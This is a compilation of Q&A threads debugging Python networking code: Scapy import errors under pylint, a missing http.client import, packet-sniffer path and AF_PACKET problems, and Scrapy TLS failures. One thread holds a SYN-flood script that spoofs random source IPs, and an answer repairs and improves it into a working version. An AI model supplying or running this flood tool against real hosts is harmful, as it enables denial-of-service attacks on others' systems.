VS Code says it can't find IP in scapy.all,
but from a terminal, I can import it just fine.
Could somebody tell me why?
I get exactly the same issue with my Scapy code in VS Code. I think it's to do with the way pylint is working.
When you run from scapy.all import IP, Python loads scapy/all.py, which includes the line from scapy.layers.all import *. scapy/layers/all.py includes this code:
for _l in conf.load_layers:
    log_loading.debug("Loading layer %s" % _l)
    try:
        load_layer(_l, globals_dict=globals(), symb_list=__all__)
    except Exception as e:
        log.warning("can't import layer %s: %s", _l, e)
conf.load_layers is defined over in scapy/config.py:
load_layers = ['bluetooth', 'bluetooth4LE', 'dhcp', 'dhcp6', 'dns',
               'dot11', 'dot15d4', 'eap', 'gprs', 'hsrp', 'inet',
               'inet6', 'ipsec', 'ir', 'isakmp', 'l2', 'l2tp',
               'llmnr', 'lltd', 'mgcp', 'mobileip', 'netbios',
               'netflow', 'ntp', 'ppp', 'pptp', 'radius', 'rip',
               'rtp', 'sctp', 'sixlowpan', 'skinny', 'smb', 'snmp',
               'tftp', 'vrrp', 'vxlan', 'x509', 'zigbee']
I suspect that pylint doesn't follow those imports correctly.
I've tried the workarounds suggested in the relevant GitHub issue, but they don't seem to fix anything for Scapy. Pylint eventually added specific workarounds for the issues in NumPy, but no one has done that for Scapy.
You can work around these issues by directly importing the IP class from the relevant layer at the top of your Python file:
from scapy.layers.inet import IP, UDP, TCP, ICMP
Et voila! No more pylint complaints about those imports.
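If you would rather keep importing from scapy.all, another workaround (my suggestion, not something the Scapy docs prescribe) is to suppress the specific pylint message on that line, since the names really do exist at runtime:

# The names are injected into scapy.all dynamically, so tell pylint
# not to flag this line rather than restructuring the import.
from scapy.all import IP, UDP, TCP, ICMP  # pylint: disable=no-name-in-module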
This is my first posting, so please forgive any lack of decorum.
I am building a SeeingWand as outlined in MagPi issue #71.
I have installed and tested all the hardware. I then installed the Python code; the original code was Python 2.7, and I have updated it to run under Python 3, but I get a strange error when I run it:
The system displays that the http module does not have a .client attribute.
The documentation says it does. I have tried the .client and .server attributes; both give the same error. What am I doing wrong?
I have tried several coding variations and several builds of the Raspberry Pi OS (Raspbian); most give the same errors.
import picamera, http, urllib, base64, json, re
from os import system
from gpiozero import Button

# CHANGE {MS_API_KEY} BELOW WITH YOUR MICROSOFT VISION API KEY
ms_api_key = "{MS_API_KEY}"

# camera button - this is the BCM number, not the pin number
camera_button = Button(27)

# setup camera
camera = picamera.PiCamera()

# setup vision API
headers = {
    'Content-Type': 'application/octet-stream',
    'Ocp-Apim-Subscription-Key': ms_api_key,
}
params = urllib.parse.urlencode({
    'visualFeatures': 'Description',
})

# loop forever waiting for button press
while True:
    camera_button.wait_for_press()
    camera.capture('/tmp/image.jpg')
    body = open('/tmp/image.jpg', "rb").read()
    try:
        conn = http.client.HTTPSConnection('westcentralus.api.cognitive.microsoft.com')
        conn.request("POST", "/vision/v1.0/analyze?%s" % params, body, headers)
        response = conn.getresponse()
        analysis = json.loads(response.read())
        image_caption = analysis["description"]["captions"][0]["text"].capitalize()
        # validate text before system() call; use subprocess in next version
        if re.match("^[a-zA-Z ]+$", image_caption):
            system('espeak -ven+f3 -k5 -s120 "' + image_caption + '"')
        else:
            system('espeak -ven+f3 -k5 -s120 "i do not know what i just saw"')
        conn.close()
    except Exception as e:
        print(e.args)
Expected results are:
when I push button 1, I expect the camera to take a picture
when I push button 2, I expect to access MSFT Azure to identify the picture using AI
the final output is for the Wand to access the audio HAT and describe what the Wand is "looking" at.
try adding an import like this:
import http.client
Edit: http is a Python package. Even if the package contains some modules, it does not automatically import those modules when you import the package, unless the __init__.py for that package does so on your behalf. In the case of http, the __init__.py is empty, so you get nothing gratis just for importing the package.
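For example, here is a minimal sketch of the relevant part of the question's code with the submodule imported explicitly (hostname and API path are taken from the question; the key is a placeholder):

import http.client   # makes the http.client submodule available
import urllib.parse  # the same rule applies to urllib: parse is a submodule too

params = urllib.parse.urlencode({'visualFeatures': 'Description'})
headers = {'Content-Type': 'application/octet-stream',
           'Ocp-Apim-Subscription-Key': 'YOUR_KEY_HERE'}
body = open('/tmp/image.jpg', 'rb').read()

# Note the spelling: the class in http.client is HTTPSConnection.
conn = http.client.HTTPSConnection('westcentralus.api.cognitive.microsoft.com')
conn.request("POST", "/vision/v1.0/analyze?%s" % params, body, headers)
response = conn.getresponse()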
I have written code for sniffing packets using Scapy in Python, and I ran into a problem that confuses me, shown in the picture below.
(screenshot of the error: the traceback ends with "OSError: No such file or directory")
This is the code:
import subprocess
import sys
import time
import logging

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
logging.getLogger("scapy.loading").setLevel(logging.ERROR)
logging.getLogger("scapy.interactive").setLevel(logging.ERROR)

try:
    from scapy.all import *
except ImportError:
    sys.exit()

interface = 'wlp10s0'
subprocess.call(["ifconfig", interface, "promisc"], stdout=None, stderr=None, shell=False)
print 'Interface has been set to Promiscuous mode'

totalpackets = 0
sniffingtime = 10
protocols = 0
infinite = 1

def timenow():
    currenttime = time.strftime("%m%d%y-%H%M%S")
    return currenttime

def export():
    p = sniff(iface='wlp10s0', timeout=sniffingtime, count=0)
    wrpcap('./home/Desktop/' + timenow() + '.pcap', p)

while infinite == 1:
    export()
I hope someone can help me solve this.
Thank you.
./home/... is an invalid path. Use /home/... instead.
It clearly says "OSError: No such file or directory". You may want to look up those errors ;-)
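A sketch of the fix, assuming the capture files are meant to land on the user's Desktop (that target directory is my assumption):

import os
import time

def timenow():
    return time.strftime("%m%d%y-%H%M%S")

# Build an absolute path instead of the relative './home/...' one.
pcap_path = os.path.join(os.path.expanduser('~/Desktop'), timenow() + '.pcap')
# then, inside export():  wrpcap(pcap_path, p)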
I am working on building a packet sniffing program using Python; however, I have hit a speed bump. For some reason I think socket has not imported properly, because I get the following message when my program runs: AttributeError: module 'socket' has no attribute 'AF_PACKET'
I am using OS X, PyCharm is my IDE, and I am running the latest version of Python, if that helps.
Anyway, here is my complete program so far:
import struct
import textwrap
import socket

def main():
    connection = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(3))
    while True:
        rawData, address = connection.recvfrom(65535)
        receiver_mac, sender_mac, ethernetProtocol, data = ethernet_frame(rawData)
        print('\nEthernet Frame: ')
        print('Destination: {}, Source: {}, Protocol: {}'.format(receiver_mac, sender_mac, ethernetProtocol))

# Unpack ethernet frame
def ethernet_frame(data):
    receiver_mac, sender_mac, protocol = struct.unpack('! 6s 6s H', data[:14])
    return getMacAddress(receiver_mac), getMacAddress(sender_mac), socket.htons(protocol), data[14:]

# Convert the Mac address from the jumbled up form from above into human readable format
def getMacAddress(bytesAddress):
    bytesString = map('{:02x}'.format, bytesAddress)
    macAddress = ':'.join(bytesString).upper()
    return macAddress

main()
Thanks for any help in advance!
Actually, AF_PACKET doesn't work on OS X; it works on Linux.
AF_PACKET equivalent under Mac OS X (Darwin)
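As a quick runtime check (a small sketch; on macOS you would need a different mechanism such as libpcap instead):

import socket
import sys

# AF_PACKET is a Linux-only address family; the attribute simply
# does not exist in the socket module on macOS or Windows.
if not hasattr(socket, 'AF_PACKET'):
    sys.exit("socket.AF_PACKET is unavailable on this platform (Linux only)")

connection = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.ntohs(3))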
I ran into this issue on macOS 10.13.1, using Python 3.6.3 and this cool scapy fork that is compatible with Python 3.
I was using version 0.22 of that tool, and as suggested in this issue, downgrading to version 0.21 fixed it!
In case scapy is not a viable alternative, you could also try the pcap library as suggested in this post (although using Python 2 seems to be necessary there).
I'm writing a script in Python which uses Scapy, but my problem is that I get this exception:
i = IP()
NameError: global name 'IP' is not defined
This is my script:
import random
from scapy import *
import threading
import logging

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

print ("Which IP would you like to choose?")
ip = raw_input("-->")
print ("Which Port would you like to choose?")
port = raw_input("-->")

class sendSYN(threading.Thread):
    global ip, port

    def __init__(self):
        threading.Thread.__init__(self)

    def run(self):
        # Method -
        i = IP()
        i.src = "%i.%i.%i.%i" % (random.randint(1, 254), random.randint(1, 254), random.randint(1, 254), random.randint(1, 254))
        i.dst = ip
        t = TCP()
        t.sport = random.randint(1, 65535)
        t.dport = port
        t.flags = 'S'
        send(i/t, verbose=0)

count = 0
while True:
    if threading.activeCount() < 200:
        sendSYN().start()
        count += 1
        if count % 100 == 0:
            print ("\rPackets SYN\t:\t\t\t%i" % count)
What should I do to fix it?
import IP/TCP
You can import all the layers scapy provides directly from the scapy.layers.* subpackage. This is fine as long as you do not require any other functionality like send/sendp/sniff/..., or some pretty magical layers like ASN.1, which fail and raise an exception if global initialization that is usually performed by importing scapy.all is missing.
The specific import for IP() and TCP() (check your scapy/layers/inet.py)
from scapy.layers.inet import IP, TCP
would be enough as long as you only used them for de-/serialization (e.g. assembling/disassembling packets), but since you also require send(), you have to import scapy.all as Semih Yagcioglu suggested.
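For illustration, a small sketch of that distinction (the destination address is just a placeholder):

# Building/dissecting packets needs only the layer classes:
from scapy.layers.inet import IP, TCP

pkt = IP(dst="192.0.2.1") / TCP(dport=80, flags="S")  # assembly works
wire = str(pkt)  # serialization works too (Python 2 / scapy 2.x)

# Sending, however, relies on machinery initialized by scapy.all:
from scapy.all import send
send(pkt, verbose=0)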
Please note that according to the scapy manual, the import line changed from from scapy import * (scapy v1.x) to from scapy.all import * (since scapy v2.x); therefore the following should be fine for you:
from scapy.all import send, IP, TCP
Notice that importing scapy.all is pretty slow as it wildcard imports all the subpackages and does some initialization magic.
That said, you should try to avoid unnecessary wildcard imports like the following (coding style; even though there is not much difference in the case of scapy):
from scapy.all import *
python 2.7
scapy v2.3.1 is compatible with Python 2.7 on Linux.
However, it is not that trivial to get it fully functional on Windows; see problems with scapy on windows, especially with sending packets over physical WiFi NICs. Typically, Windows people run Python 2.6 with scapy 2.3.1 (note that there might be permission issues when scapy tries to get raw socket access on certain Windows versions). To spare you some headaches, I strongly recommend running it on Linux (a VirtualBox VM is fine).
working example of your code
The following code works fine for me on Linux, Python 2.7, scapy 2.3.1:
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
import threading
import random
from scapy.all import IP, TCP, RandIP, send, conf, get_if_list

logging.basicConfig(level=logging.DEBUG, format='%(asctime)-15s [%(threadName)s] %(message)s')

class sendSYN(threading.Thread):
    def __init__(self, target):
        threading.Thread.__init__(self)
        self.ip, self.port = target

    def run(self):
        pkt = IP(src=RandIP(),
                 dst=self.ip)/TCP(flags='S',
                                  dport=self.port,
                                  sport=random.randint(0, 65535))
        send(pkt)
        logging.debug("sent: %s" % pkt.sprintf("{IP:%IP.src%:%TCP.sport% -> %IP.dst%:%TCP.dport%}"))

if __name__ == '__main__':
    conf.verb = 0  # suppress output
    print ("Which Interface would you like to choose? %r" % get_if_list())
    iface = raw_input("[%s] --> " % get_if_list()[0]) or get_if_list()[0]
    if iface not in get_if_list():
        raise Exception("Interface %r not available" % iface)
    conf.iface = iface
    print ("Which IP would you like to choose?")
    ip = raw_input("-->")
    print ("Which Port would you like to choose?")
    port = int(raw_input("-->"))
    count = 0
    while True:
        if threading.activeCount() < 200:
            sendSYN((ip, port)).start()
            count += 1
            if count % 100 == 0:
                logging.info("\rPackets SYN\t:\t\t\t%i" % count)
- fixed import
- uses logging instead of print
- passes the target to the class instance instead of using globals
- added interface selection (a must-have for Windows, as scapy uses Linux-style interface names on both Linux and Windows, which is why you may have to guess the correct one on Windows)
- globally sets scapy verbosity
- uses the RandIP() field instead of manually building a random IP
- TCP.sport/dport expects an integer, therefore you have to int() the value read from stdin
- prints each sent packet's IP/port using sprintf()
I think you should make the necessary imports for what seems to be missing.
Try this:
from scapy.all import IP
Or this:
from scapy.all import *
It looks like you are using Python 3, judging by your print(), but when you wanted to get input from the user you used raw_input instead of input.
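If the script needs to run under both versions, a common shim (a sketch, not part of the original answer) is:

try:
    raw_input          # defined in Python 2
except NameError:
    raw_input = input  # Python 3: input() behaves like Python 2's raw_input()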
I have to crawl https://dms.psc.sc.gov/Web/dockets, which uses TLS v1.2, using the Scrapy framework. But on requesting the URL it fails to load and raises [<twisted.python.failure.Failure <class 'OpenSSL.SSL.Error'>>].
There is an issue discussed on GitHub, https://github.com/scrapy/scrapy/issues/981, but it did not work for me. I have Scrapy v0.24.5 and Twisted version >= 14.
When I try to crawl another site which also uses TLS v1.2 it works, but not for https://dms.psc.sc.gov.
How do I solve this issue?
A PR fixing this problem in Scrapy was already merged. Recently (in February 2016) there was another pull request fixing a similar bug.
I see that with the most recent Scrapy version I can fetch your page all right, but with older versions the problem still appears.
In general, if you stumble on an HTTPS problem with Scrapy, the solution is:
- upgrade Scrapy to the newest version
- check which version of Twisted you use; if it's not the most recent, update to the most recent Twisted version (as of the time of writing, versions above 14 are confirmed to be significantly better when it comes to SSL)
If you still experience problems after updating Scrapy and Twisted, you may need to subclass ScrapyClientContextFactory - see the answer below for details.
More details in this GitHub issue.
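A quick way to confirm which versions you are actually running (a small sketch using the standard version attributes):

import scrapy
import twisted

# Print the installed versions to verify that the upgrades took effect.
print("Scrapy:", scrapy.__version__)
print("Twisted:", twisted.version.short())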
1. Add DOWNLOADER_CLIENTCONTEXTFACTORY = 'testproject.CustomContext.CustomClientContextFactory' to your settings.py.
2. Create a file called CustomContext.py in your project directory and add the code below:
from OpenSSL import SSL
from twisted.internet.ssl import ClientContextFactory
from twisted.internet._sslverify import ClientTLSOptions
from scrapy.core.downloader.contextfactory import ScrapyClientContextFactory

class CustomClientContextFactory(ScrapyClientContextFactory):
    def getContext(self, hostname=None, port=None):
        ctx = ClientContextFactory.getContext(self)
        # Enable all workarounds to SSL bugs as documented by
        # http://www.openssl.org/docs/ssl/SSL_CTX_set_options.html
        ctx.set_options(SSL.OP_ALL)
        if hostname:
            ClientTLSOptions(hostname, ctx)
        return ctx
Note: It worked well for crawling https sites on Windows, but when I tried the same on Ubuntu 14.04 it threw an error as below:
from twisted.internet._sslverify import ClientTLSOptions
exceptions.ImportError: cannot import name ClientTLSOptions
It would be great if anyone adds a solution for the above error.
EDIT:
Instead of using from twisted.internet._sslverify import ClientTLSOptions directly, I have changed it to the below:
try:
    # available since twisted 14.0
    from twisted.internet._sslverify import ClientTLSOptions
except ImportError:
    ClientTLSOptions = None
Anyone getting "TypeError: unbound method getContext() must be called with ClientContextFactory instance as first argument ...":
replace ctx = ClientContextFactory.getContext(self)
with ctx = ScrapyClientContextFactory.getContext(self)
Vinodh Velumayil's answer is right, but I had to edit this line:
ctx = ClientContextFactory.getContext(self)
to this:
inst = ClientContextFactory()
ctx = inst.getContext()
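Putting those fixes together, the getContext method would look roughly like this (a sketch combining the snippets above, with a guard for the case where ClientTLSOptions could not be imported; not a tested drop-in):

from OpenSSL import SSL
from twisted.internet.ssl import ClientContextFactory
from scrapy.core.downloader.contextfactory import ScrapyClientContextFactory

try:
    # available since twisted 14.0
    from twisted.internet._sslverify import ClientTLSOptions
except ImportError:
    ClientTLSOptions = None

class CustomClientContextFactory(ScrapyClientContextFactory):
    def getContext(self, hostname=None, port=None):
        # Instantiate the base factory rather than calling the unbound
        # method, which avoids the TypeError mentioned above.
        inst = ClientContextFactory()
        ctx = inst.getContext()
        ctx.set_options(SSL.OP_ALL)  # enable OpenSSL bug workarounds
        # Only apply the TLS options when the helper could be imported.
        if hostname and ClientTLSOptions is not None:
            ClientTLSOptions(hostname, ctx)
        return ctx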